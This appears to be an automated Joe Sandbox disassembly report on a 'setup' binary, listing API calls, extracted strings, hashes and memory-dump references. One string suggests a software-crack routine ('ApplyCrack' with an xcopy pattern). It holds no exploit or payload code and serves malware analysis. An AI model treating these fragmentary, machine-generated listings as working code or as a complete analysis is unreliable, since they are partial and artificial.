                                                                                                    • String ID:
                                                                                                    • API String ID: 1353328452-0
                                                                                                    • Opcode ID: 02b9f346aec81e54f507a24a140063c30514e8a1cf7b007687c516fc965357d0
                                                                                                    • Instruction ID: 9bdf41528259cf67d4761ee456076407cea977b2ec8ba513b4c4c4d8ab7901f3
                                                                                                    • Opcode Fuzzy Hash: 02b9f346aec81e54f507a24a140063c30514e8a1cf7b007687c516fc965357d0
                                                                                                    • Instruction Fuzzy Hash: D5319072624326AFDB15AFB4BD8A82E76BDF715352B00053AF905D25B1DB709C208A54
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalDeleteSectionfree
                                                                                                    • String ID:
                                                                                                    • API String ID: 2988086103-0
                                                                                                    • Opcode ID: 2e009767229964c900a27ed4f5c03e2f1d385842b691b1625bad2015e7a0ce50
                                                                                                    • Instruction ID: bce6274e3b4b6355ffd72d502a6c012349070a669fbce722ab0a908772170e73
                                                                                                    • Opcode Fuzzy Hash: 2e009767229964c900a27ed4f5c03e2f1d385842b691b1625bad2015e7a0ce50
                                                                                                    • Instruction Fuzzy Hash: 0331E4B14157058ADB10BF78D9857A97BE8AF00300F4609B9DC849F24BEB74E559CF92
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(avrt.dll), ref: 00212670
                                                                                                    • GetProcAddress.KERNEL32(00000000,AvSetMmThreadCharacteristicsA), ref: 00212684
                                                                                                    • GetProcAddress.KERNEL32(00000000,AvRevertMmThreadCharacteristics), ref: 00212691
                                                                                                    • WaitForSingleObject.KERNEL32(?,?), ref: 002126E4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoadObjectSingleWait
                                                                                                    • String ID: Audio$AvRevertMmThreadCharacteristics$AvSetMmThreadCharacteristicsA$avrt.dll
                                                                                                    • API String ID: 781169432-2339331680
                                                                                                    • Opcode ID: ab5d16e2c6c78f13fba69fd04ea1524df1326f84aab9b28d63da022ae245b619
                                                                                                    • Instruction ID: 674c9f29d1b48223e1a403eee4b408708d359f3c6ce960b65bfc4b4b4d2c108a
                                                                                                    • Opcode Fuzzy Hash: ab5d16e2c6c78f13fba69fd04ea1524df1326f84aab9b28d63da022ae245b619
                                                                                                    • Instruction Fuzzy Hash: 9EA1ADB0624702DFC710EF25C884AABB7E8FB95315F10092DF596932A1DB70D8A9CF52
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$InfoMonitor
                                                                                                    • String ID: (
                                                                                                    • API String ID: 544073309-3887548279
                                                                                                    • Opcode ID: 759e4b0110c85ffc5f39cdbd953137df8b41f44a3f61d3d3e16695e35d75d36d
                                                                                                    • Instruction ID: 4e8e5d4a1ccea8c2b8b26361b9ba059a3646bd7e4091ae2655d2195060f78033
                                                                                                    • Opcode Fuzzy Hash: 759e4b0110c85ffc5f39cdbd953137df8b41f44a3f61d3d3e16695e35d75d36d
                                                                                                    • Instruction Fuzzy Hash: 6F8113B56183018FD708DF28D59871ABBE0FF84314F158A2DE8898B355E774D898CF86
                                                                                                    APIs
                                                                                                    • malloc.MSVCRT ref: 00284664
                                                                                                    • exit.MSVCRT ref: 002846B4
                                                                                                    • malloc.MSVCRT ref: 00284676
                                                                                                      • Part of subcall function 001EE7F0: malloc.MSVCRT ref: 001EE800
                                                                                                      • Part of subcall function 001EE7F0: CharToOemW.USER32 ref: 001EE822
                                                                                                      • Part of subcall function 001EE7F0: free.MSVCRT ref: 001EE82E
                                                                                                    • longjmp.MSVCRT ref: 002846DF
                                                                                                    • exit.MSVCRT ref: 00284741
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$exit$Charfreelongjmp
                                                                                                    • String ID: %s$ERROR: archive structure corrupted (bad data)$ERROR: can't alloc %lu memory bytes
                                                                                                    • API String ID: 2693856100-1639016738
                                                                                                    • Opcode ID: cf0fc5dce8ec68d5ac0096116bf62ba5cabf72d8a9d0c17707bc33a02ae01767
                                                                                                    • Instruction ID: bf3e859c3cfda698c44942ec57aef0edfe72ca2349b70eb328d680645465caa0
                                                                                                    • Opcode Fuzzy Hash: cf0fc5dce8ec68d5ac0096116bf62ba5cabf72d8a9d0c17707bc33a02ae01767
                                                                                                    • Instruction Fuzzy Hash: 862138B45293159BC310BF68D54631EBBE4BF05748F42882DE5CC9B242DBB9D8A0CF96
                                                                                                    APIs
                                                                                                    • malloc.MSVCRT ref: 001F11B5
                                                                                                    • exit.MSVCRT ref: 001F1209
                                                                                                    • malloc.MSVCRT ref: 001F11CB
                                                                                                      • Part of subcall function 001EE7F0: malloc.MSVCRT ref: 001EE800
                                                                                                      • Part of subcall function 001EE7F0: CharToOemW.USER32 ref: 001EE822
                                                                                                      • Part of subcall function 001EE7F0: free.MSVCRT ref: 001EE82E
                                                                                                    • longjmp.MSVCRT ref: 001F123F
                                                                                                    • exit.MSVCRT ref: 001F1297
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$exit$Charfreelongjmp
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes$INTERNAL ERROR: Overflow of compression methods table
                                                                                                    • API String ID: 2693856100-3746232221
                                                                                                    • Opcode ID: 98a53110573e54ec7b0e53c45102374a2f3b55820f31f9a05ec6c9765b2002d5
                                                                                                    • Instruction ID: 2b02f679af20e233ba2d1357e3d77ffeaedf09ce3b5d58ba19402d011f82b6d3
                                                                                                    • Opcode Fuzzy Hash: 98a53110573e54ec7b0e53c45102374a2f3b55820f31f9a05ec6c9765b2002d5
                                                                                                    • Instruction Fuzzy Hash: B02127B0919714DBD311BFA5D88122EBBE4FF44700F42992DE5C8D7216D7788850CF96
                                                                                                    APIs
                                                                                                    • malloc.MSVCRT ref: 001F12E5
                                                                                                    • exit.MSVCRT ref: 001F1339
                                                                                                    • malloc.MSVCRT ref: 001F12FB
                                                                                                      • Part of subcall function 001EE7F0: malloc.MSVCRT ref: 001EE800
                                                                                                      • Part of subcall function 001EE7F0: CharToOemW.USER32 ref: 001EE822
                                                                                                      • Part of subcall function 001EE7F0: free.MSVCRT ref: 001EE82E
                                                                                                    • longjmp.MSVCRT(?,?,00000000,001ED421), ref: 001F137F
                                                                                                    • exit.MSVCRT ref: 001F13D7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$exit$Charfreelongjmp
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes$Too much external compression methods defined
                                                                                                    • API String ID: 2693856100-2943636624
                                                                                                    • Opcode ID: c0090ea9863fad7bd0a3f1854ea8cb769e28c1988c827de3a23ee57f370d4096
                                                                                                    • Instruction ID: 87aec57e453143bc692e78e304958486985d5d651d4b7561074b7f479eadd36e
                                                                                                    • Opcode Fuzzy Hash: c0090ea9863fad7bd0a3f1854ea8cb769e28c1988c827de3a23ee57f370d4096
                                                                                                    • Instruction Fuzzy Hash: CC2115B0519718EBD310BF64D94222EBBE0FF44714F42982DE5C897212DBB98850CF96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteMessageShell
                                                                                                    • String ID: %ls\%ls$/E /I /Y "%ls" "%ls"$ApplyCrack: swprintfInvalid path.$Error$open$xcopy
                                                                                                    • API String ID: 649218774-3634419400
                                                                                                    • Opcode ID: bf21978c83fdad99ceec528087186516f039e5646bad9420b2c9f6332692f026
                                                                                                    • Instruction ID: aec0608948c793c28090289c923ae79e06516c8b231fc79544f5612dabf00763
                                                                                                    • Opcode Fuzzy Hash: bf21978c83fdad99ceec528087186516f039e5646bad9420b2c9f6332692f026
                                                                                                    • Instruction Fuzzy Hash: A921ECB05097419BD310EF64D98879FBBF0BBA5748F01CD1DE59947204E7B8D5888B83
                                                                                                    APIs
                                                                                                    • strstr.MSVCRT ref: 001EE625
                                                                                                    • strlen.MSVCRT ref: 001EE633
                                                                                                      • Part of subcall function 001EDC30: strlen.MSVCRT ref: 001EDC42
                                                                                                      • Part of subcall function 001EDC30: strlen.MSVCRT ref: 001EDC4C
                                                                                                      • Part of subcall function 001EDC30: memcpy.MSVCRT(?,?,00000000,?,?,?,001EE650,?,?,?,?,?,?,00000000,001EE863), ref: 001EDC76
                                                                                                      • Part of subcall function 001EDC30: strcpy.MSVCRT(?,?,00000000,?,?,?,001EE650,?,?,?,?,?,?,00000000,001EE863), ref: 001EDC82
                                                                                                      • Part of subcall function 001EDC30: strcat.MSVCRT(?,?,00000000,?,?,?,001EE650,?,?,?,?,?,?,00000000,001EE863), ref: 001EDC96
                                                                                                    • strlen.MSVCRT ref: 001EE663
                                                                                                    • malloc.MSVCRT ref: 001EE66E
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,001EE863), ref: 001EE684
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen$memcpy$mallocstrcatstrcpystrstr
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes
                                                                                                    • API String ID: 192757537-701587655
                                                                                                    • Opcode ID: daa2fd3e59e5fef58a834d8b1c674f0b730eede22ad7ab46b8b3f82f986dd639
                                                                                                    • Instruction ID: a576605474661bdbc5846a3b9b0a3837087c4970071eaf4208dabd89168872e3
                                                                                                    • Opcode Fuzzy Hash: daa2fd3e59e5fef58a834d8b1c674f0b730eede22ad7ab46b8b3f82f986dd639
                                                                                                    • Instruction Fuzzy Hash: D11148B16187109BD700BF29A98516EFBE4FF88314F058D2EE4C893301D77499449F82
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(dsound,?,00214043,0038388C,0038389C), ref: 00212597
                                                                                                    • GetProcAddress.KERNEL32(00000000,DirectSoundEnumerateW), ref: 002125B0
                                                                                                    • GetProcAddress.KERNEL32(00000000,DirectSoundCaptureEnumerateW), ref: 002125BD
                                                                                                    • GetProcAddress.KERNEL32(00000000,DirectSoundCreate8), ref: 002125CA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: DirectSoundCaptureEnumerateW$DirectSoundCreate8$DirectSoundEnumerateW$dsound
                                                                                                    • API String ID: 2238633743-2705328528
                                                                                                    • Opcode ID: d93dacc85890811040b04b07c7cb4ad202dc344ebd42491db60de76dd9598865
                                                                                                    • Instruction ID: ea1137182575f0aa1ca69160cddb26b951e97fecb2d9926b1ac00a69513ce9de
                                                                                                    • Opcode Fuzzy Hash: d93dacc85890811040b04b07c7cb4ad202dc344ebd42491db60de76dd9598865
